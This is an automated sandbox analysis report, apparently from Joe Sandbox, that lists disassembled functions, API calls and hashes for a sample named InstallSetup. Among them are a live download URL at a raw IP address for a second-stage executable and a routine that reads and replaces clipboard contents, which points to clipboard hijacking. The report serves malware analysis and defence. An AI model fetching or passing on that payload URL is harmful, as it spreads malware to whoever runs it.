API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 00940E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,00940223,?,?), ref: 00940E19
SetErrorMode.KERNEL32(00000000,?,?,00940223,?,?), ref: 00940E1E

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 263bd457605f750de3bf08e678698831de7a69c0df499e67b04a708b532cfd21
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 82D01232245228B7DB002A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 00C01375 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00C013C6

Memory Dump Source

Source File: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c00000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: e576860b550fa5ffe295d18b02c46c89f00a3e406aac4656111d33afdd47ce89
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 0A113F79A00208EFDB01DF98C985E98BBF5EF08351F098094F9489B361D771EA50DF80

Non-executed Functions

Function 00941942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0094194D
Sleep.KERNEL32(00001541), ref: 00941957

Part of subcall function 0094CE77: _strlen.LIBCMT ref: 0094CE8E

OpenClipboard.USER32(00000000), ref: 00941984
GetClipboardData.USER32(00000001), ref: 00941994
_strlen.LIBCMT ref: 009419B0
_strlen.LIBCMT ref: 009419DF
_strlen.LIBCMT ref: 00941B23
EmptyClipboard.USER32 ref: 00941B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 00941B46
GlobalUnlock.KERNEL32(00000000), ref: 00941B70
SetClipboardData.USER32(00000001,00000000), ref: 00941B79
GlobalFree.KERNEL32(00000000), ref: 00941B80
CloseClipboard.USER32 ref: 00941BA4
Sleep.KERNEL32(000002D2), ref: 00941BAF

Strings

i, xrefs: 009419C0
4#E, xrefs: 0094195D

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: d9fd60c1dcad5aeeca595b4b11865b4212047a5b57cc49da7444e55ad4831aa0
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 6E510130C017849AE311DFA4ED46BBD7778FF6A302F045225E805A2163EB709AC1C76A

Function 00942361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0094239C
GetClientRect.USER32(?,?), ref: 009423B1
GetDC.USER32(?), ref: 009423B8
CreateSolidBrush.GDI32(00646464), ref: 009423CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 009423EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0094240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00942416
MulDiv.KERNEL32(00000008,00000000), ref: 0094241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00942443
SetBkMode.GDI32(?,00000001), ref: 009424CE
_wcslen.LIBCMT ref: 009424E6

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 88e038fa589ca7568fefc881c6e68f3e85f6bc794c9b922a381119fe49074df2
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 2071DB72900218AFDB22DF68DD85FAEB7BCEB49751F0041A5B609E6155DA70AF80CF24

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#INF, xrefs: 0043E9CB
1#QNAN, xrefs: 0043E9C4
1#SNAN, xrefs: 0043E9BD
1#IND, xrefs: 0043E9B6

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 0097B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0097BCF4,?,00000000), ref: 0097BA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0097BCF4,?,00000000), ref: 0097BA97
GetACP.KERNEL32(?,?,0097BCF4,?,00000000), ref: 0097BAAC

Strings

OCP, xrefs: 0097BA29
ACP, xrefs: 0097B9F3

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 7aa5098a864fd96db0798d7766340d39f33cd437f29fa2c14f72519b661042f7
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 2D217F33600105AAEB39AF54D901BA777EAEF94F60B56C465E90EDB100F732DE40C394

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 0097BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

Part of subcall function 00972141: _free.LIBCMT ref: 009721A0
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0097BCB5
IsValidCodePage.KERNEL32(00000000), ref: 0097BD10
IsValidLocale.KERNEL32(?,00000001), ref: 0097BD1F
GetLocaleInfoW.KERNEL32(?,00001001,00970A1C,00000040,?,00970B3C,00000055,00000000,?,?,00000055,00000000), ref: 0097BD67
GetLocaleInfoW.KERNEL32(?,00001002,00970A9C,00000040), ref: 0097BD86

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 7d7f1b7c961d6f8e22ec712ceb24d3f23b4731f9324d327dafdca1103036bdba
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: F15174739002099BDB11DFA9DC45BBE77B8FF55700F18C465F948E7190EB719A048B61

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
